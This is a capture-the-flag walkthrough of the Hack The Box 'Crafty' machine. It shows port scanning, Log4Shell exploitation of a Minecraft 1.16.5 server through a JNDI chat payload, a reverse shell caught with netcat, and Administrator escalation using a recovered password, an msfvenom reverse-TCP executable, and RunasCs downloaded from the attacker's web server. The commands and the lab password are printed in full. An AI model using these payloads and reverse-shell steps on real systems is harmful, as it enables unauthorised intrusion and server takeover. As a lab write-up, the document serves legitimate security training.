Crafty - Walkthroughs

## User Flag ### NMAP Scan ```shell TCPPORTS=$(nmap -sT -p- --min-rate=1000 -T4 $TARGETIP | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); sudo nmap -p$TCPPORTS -sTVC -O $TARGETIP --open ``` ```shell Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-21 11:47 MST Nmap scan report for crafty.htb (10.10.11.249) Host is up (0.13s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Crafty - Official Website 25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (89%) Aggressive OS guesses: Microsoft Windows Server 2019 (89%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds ``` ### Enumeration I can see that there is a webpage available and what looks like to be a minecraft server. `NOTE: This is why it's important to scan for all available ports, as the Minecraft port will not show in a Top 1000 scan` #### Webpage Visiting the Webpage shows me a minecraft themed site: ![[Pasted image 20240221115859.png]] There is nothing of interest on the site, all the buttons lead to a page stating the feature is 'coming soon' So that means that the way into the server must be through the Minecraft port. I believe this is going to involve the widespread vulnerability, Log4j, as that was initially discovered in a Minecraft server. #### Minecraft Server First I have to find a way to interact with the Minecraft server. I can also see from my nmap scan that, the server is using Minecraft Version 1.16.5. Therefore, I need to find something that can interact with that version of Minecraft. After some googling I found a launcher called TLauncher. This Launcher will allow me to install and launch a specific version of Minecraft. I can launch it with the command: ```shell sudo java -jar ./TLauncher-2.895.jar ``` ![[Pasted image 20240221124808.png]] In the window, I am able to choose the correct version of Minecraft to interact with the server. ![[Pasted image 20240221172918.png]] ### Preparing Log4j I can see that I am in game and the version is 1.16.5. However, now I need to find out the way to exploit the vulnerable Log4j in the server. A quick search yields [Kozomers](https://github.com/kozmer/log4j-shell-poc) exploit on GitHub.com and download it with the following command: ```shell git clone https://github.com/kozmer/log4j-shell-poc ``` Now the exploit states that it needs a specific version of Java in order to function correctly. Luckily, the author included instructions on how to download the correct version for it. I can navigate to the [Java Download Page](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) and follow the screenshot to download the correct version of Java. I can run the exploit using the following command: ```shell python3 poc.py --userip 10.10.14.2 --webport 1236 --lport 9001 ``` ![[Pasted image 20240221182302.png]] This sets up a webserver that we can call from within the Minecraft server to get a shell. However, since the vulnerable server is a windows machine, we need to change the exploit to either user `cmd.exe` or `powershell.exe` from the current `/bin/sh`. I changed it to PowerShell, because PowerShell should give me more options. ### Exploiting Log4j We now have everything we need to exploit the server. We can launch into the game and connect to the server. I will also briefly go over how to connect to the server using another tool that allows us to interact with the server without needing to be in the game. ![[Pasted image 20240221182916.png]]![[Pasted image 20240221182943.png]] I can now join the server and it puts me inside a Minecraft game. ![[Pasted image 20240221183745.png]] When setting up the webserver with a vulnerability to load, the POC told me to send the command `${jndi:ldap://10.10.14.2:1389/a}`. I can open chat in game and send this message while also running a listener on my attacker machine and I should get a shell. ```shell nc -lvnp 9001 ``` ![[Pasted image 20240221184322.png]] Looking at my listener after sending the command in the in game chat, I can see that I now have a shell. ![[Pasted image 20240221184419.png]] I can find the user flag on the svc_minecraft user's desktop. User flag has been taken. #### PyCraft We can also use a program call [PyCraft](https://github.com/ammaraskar/pyCraft) found on github. This will allow us to send chats without having to launch Minecraft itself. ```shell git clone https://github.com/ammaraskar/pyCraft ``` I can run the program with: ```shell python3 start.py -u user -s 10.10.11.249:25565 ``` Once I am connected with the webserver running to send my exploit to the machine, I can then just send the same command `${jndi:ldap://10.10.14.2:1389/a}` and get a shell. ![[Pasted image 20240221185055.png]] `NOTE: The errors are normal, it should throw errors once your shell is connected.` ## Root Flag ### Enumeration After gaining the user flag, I want to go back to the directory I landed in and see if there is anything useful there. ![[Pasted image 20240221191004.png]] I looked at all the text and JSON files in the root of the server directory and decide to look into some of the folders. I choose the logs folder to see if there was anything that was logged that would expose some secrets on the server. I can see the message that I sent as a test, "hello", but nothing else of interest. I will check out the plugins folder next. ![[Pasted image 20240222095021.png]] I see that there is a JAR file in there that might contain something interesting. I can download it to my machine since I used pwncat ![[Pasted image 20240222143818.png]] ![[Pasted image 20240222143947.png]] I can see there is a htb folder and inside is a java class file. ![[Pasted image 20240222144038.png]] However, I cannot just open the file as it needs to be decompiled. Luckily VS Code has extensions for Java and it will decompile the Java code. ![[Pasted image 20240222144449.png]] I see something that looks like password and after googling what Rcon is, I verify that it is most likely a password. ![[Pasted image 20240222144713.png]] Now that I have a password, I can try to use it to exploit the server and gain an administrative shell. My first attempt is going to be with [RunasCS.exe](https://github.com/antonioCoco/RunasCs) But first I need to get it on the server and figure out what my payload will be. I can use pwncat or wget with a webserver to get both onto the server and use [[MSFVenom]] to craft a payload. ```shell msfvenom -p windows/x64/powershell_reverse_tcp LHOST=tun0 LPORT=1239 -f exe -o s.exe ``` ![[Pasted image 20240222145507.png]] ![[Pasted image 20240222145550.png]] Now that both files are on my system I can use them to run an administrator shell. But first I have to start a listener. ```shell nc -lvnp 1239 ``` Now that I have my listener running, I use RunAs with: ```powershell .\RunasCs.exe Administrator s67u84zKq8IXw s.exe ``` I can see that I got a reverse shell and I am now the Administrator user. I found the root flag and now the machine is rooted. ![[Pasted image 20240223075623.png]] ```shell python3 -m http.server 9000 ``` ```powershell wget http://10.10.14.2:9000/RunasCs.exe -O RunasCs.exe ```